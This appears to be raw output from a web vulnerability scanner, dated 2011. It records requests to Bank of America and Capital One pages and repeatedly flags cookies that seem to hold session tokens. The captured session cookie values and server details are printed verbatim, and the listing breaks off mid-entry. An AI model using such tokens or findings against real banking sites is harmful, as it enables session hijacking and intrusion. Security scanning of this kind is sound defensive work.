HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:48 GMT Content-type: text/html;charset=ISO-8859-1 Content-language: en-US Set-cookie: JSESSIONID=0000hLN0EFuVu6_KB0QSkbXPq6x:12qb4k4pc; Path=/ Set-cookie: INTL_LANG=en_US Set-cookie: ngen_throttle=497; Expires=Mon, 01 Aug 2011 22:04:48 GMT; Path=/; Domain=.bankofamerica.com Set-cookie: hp_beta=B; Expires=Mon, 01 Aug 2011 22:04:48 GMT; Path=/; Domain=.bankofamerica.com Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:04:48 GMT; Domain=.bankofamerica.com Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en_US"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Description ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /credit-cards/cardoverview.action HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:05:02 GMT Content-length: 0 Content-type: text/html Set-Cookie: SMIDENTITY=OCd1eUfyEcTBcdzRmikiUYt9Hcisc1Gh1u9btfXo6jk2iYwtjhebVw1nhgFF6KlmpRdXfWP6oAE1ISBtgIxM3LdoctvAzX27T3D45PQOpMJUeowFgmjuCz+RpSn04+9WLMmF4p/3qP0PVzBHFGFRkzwE5OaT/L0iv4fa0f523oTajKE7dlB/qRvRq16VC3uwSY8nOHjQWKuYZVD9y/EOzzuIC2pbtUE0yVubP+/mxg6D0sevE7x0PoB27bkshtOSL/Y89tKz1feb+T0FxZmgtayMUMoPsHrOu12vLkQLE2hAqZxHc87W+lL+ksrLFRBrg4mECaTf+Y2rhBFThgksB7a7YrXy+P+M1KZi7PFBOBkLBEHb3SHeMWenl/tgGDcsiPv5/+zELJAWZV22EzuihOycvz+1s2wi3UZYCS29J/mO6EQk8LZM1BJ2vaI7/Ay00YstlYJeyAGWhaR17eKkiv9oj3iMJJS7V2AOTwlg0pwItcgPIQ2pQAGe75FFiHk7; path=/; domain=.bankofamerica.com; secure Location: https://www.bankofamerica.com/credit-cards/viewall.action?context_id=all_cards Content-language: en-US Set-cookie: JSESSIONID=0000RfDmnLt4u-iNR9enyTATw_C:12qb4kb6q; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /deposits/index.action HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:53 GMT Content-length: 0 Location: https://www.bankofamerica.com/global/stateselection.action?returnUrl=https://www.bankofamerica.com/deposits/index.action Content-language: en-US Set-cookie: JSESSIONID=0000sNWjiXby7ONUwh45995dJgv:12qb4k93q; Path=/ Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:04:52 GMT; Domain=.bankofamerica.com Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /homepage/WidgetAction.go HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:36:37 GMT Server: IBM_HTTP_Server Cache-Control: no-cache Content-Length: 11 Set-Cookie: JSESSIONID=00003PfGoFif26Fdykwp9gAzvj_:15bvh4s8c; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Via: On-Demand Router/1.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /homepage/overview.go HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /homepage/stateSelect.go HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hub/index.action HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:54 GMT Content-length: 0 Content-type: text/html Location: https://www.bankofamerica.com/ Content-language: en-US Set-cookie: JSESSIONID=00008fBXnMpsDuQjSc8kH5YogBG:12qb4k2ev; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /myexpression_banking/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /planning/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:36:25 GMT Content-length: 0 Content-type: text/html Location: https://www5.bankofamerica.com/planning/investments.action Content-language: en-US Set-cookie: JSESSIONID=0000MZoA15Z0qVQ4mcJR1wynojo:12qtmh33l; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /planning/investments.action HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:32 GMT Content-type: text/html Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-control: no-cache, post-check=0, pre-check=0 Content-language: en-US Set-cookie: JSESSIONID=0000-_A2xQfu_W2uW6lF2fly4Fp:12qb4k2ev; Path=/ Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us"> <head> <meta http-equiv="Content-Type" content="text/html; charset ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /privacy/Control.do HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:05:07 GMT Content-type: text/html;charset=ISO-8859-1 Content-language: en-US Set-cookie: JSESSIONID=0000mMBXhgo6t8S8rSEKqaClP3F:12qb4k2ev; Path=/ Set-cookie: INTL_LANG=en_US Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:05:06 GMT; Domain=.bankofamerica.com Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Descri ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /privacy/index.jsp HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:05:05 GMT Content-type: text/html;charset=ISO-8859-1 Content-language: en-US Set-cookie: JSESSIONID=0000lQoVpN6o_Syjb5ohyReSXTa:12qb4k2ev; Path=/ Set-cookie: INTL_LANG=en_US Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:05:04 GMT; Domain=.bankofamerica.com Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Descri ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /retirementcenter/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /search/Search.do HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:05:13 GMT Content-length: 0 Location: https://www6.bankofamerica.com/search/Search.do Content-language: en-US Set-cookie: JSESSIONID=0000d7-ksy874kdblG0_pEKtKn2:13ihk3qeh; Path=/ Set-cookie: INTL_LANG=en_US Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sitemap/index.action HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:05:13 GMT Content-length: 0 Content-type: text/html Location: https://www.bankofamerica.com/global/stateselection.action?returnUrl=https://www.bankofamerica.com/sitemap/index.jsp Content-language: en-US Set-cookie: JSESSIONID=0000AHYKHX5RDNXbJ74F_kN_fGy:12qb4k2ev; Path=/ Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:05:13 GMT; Domain=.bankofamerica.com Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /smallbusiness/index.jsp HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:29 GMT Content-type: text/html;charset=ISO-8859-1 Content-language: en-US Set-cookie: JSESSIONID=00001dmfVt102GWARUceA1dBtn0:12qb4k7c1; Path=/ Set-cookie: INTL_LANG=en_US Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:04:28 GMT; Domain=.bankofamerica.com Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en_US"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Descript ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /about/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:40 GMT Server: Apache Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: JSESSIONID=1p8qNJWYfWB5ZkwnxDLZnjSHsp1RWFYccXhcpFpZ4PHTpW00Lg88!1025162061; path=/ Set-Cookie: Corporate=6d2bccf6cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCo8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS06NMzQwgKj3zENTDAA%3D; domain=.capitalone.com; expires=Saturday, 30-Jan-2021 22:12:40 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 55757
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><meta name="description" content="Explore the history and culture of one of America's ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /smallbusiness/?linkid=WWW_1009_SBUS_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_H1_17_T_SB1 HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:11:58 GMT Server: Apache Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: JSESSIONID=W9HtNJWTnQGllch3pXxkL3TKXyJwhGLCl9P3xbFCLfrvYFRq9yh6!1941958184; path=/ Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxNDczMzMwV2VhL3Q4TFdITkRvMHhDTW9rRWFRPT0=; expires=Tuesday, 21-Feb-2079 01:26:05 GMT Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:11:58 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 59681
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><meta name="description" content="Browse our small business banking products includin ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /smallbusiness/business-money-market/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:00 GMT Server: Apache Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: JSESSIONID=cgfmNJWQcJvjTlBLWy8QTQF18zjDLG9y6zLG2jyvTXxr2jFQ7lYV!-1710325866; path=/ Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxNDU0MDhDdmtVV0dvb0VzajAvTTlLUXNyc1pnPT0=; expires=Tuesday, 21-Feb-2079 01:26:07 GMT Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:12:00 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 60850
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><meta name="description" content="Open Capital One Direct Banking Savings accounts: B ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /smallbusiness/cards/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:11:53 GMT Server: Apache Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: JSESSIONID=XLwQNJWJ5GYGgnZ0NkdH6V6RyJygf7d1Bh1GGL0MF5G5nX3rNBYX!-201819150; path=/ Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxNTExMDJialJRVlVqUDEwS3ZWOXRwQytlYytRPT0=; expires=Tuesday, 21-Feb-2079 01:26:00 GMT Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:11:53 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 68542
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><meta name="description" content="Browse business credit cards online and apply for C ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
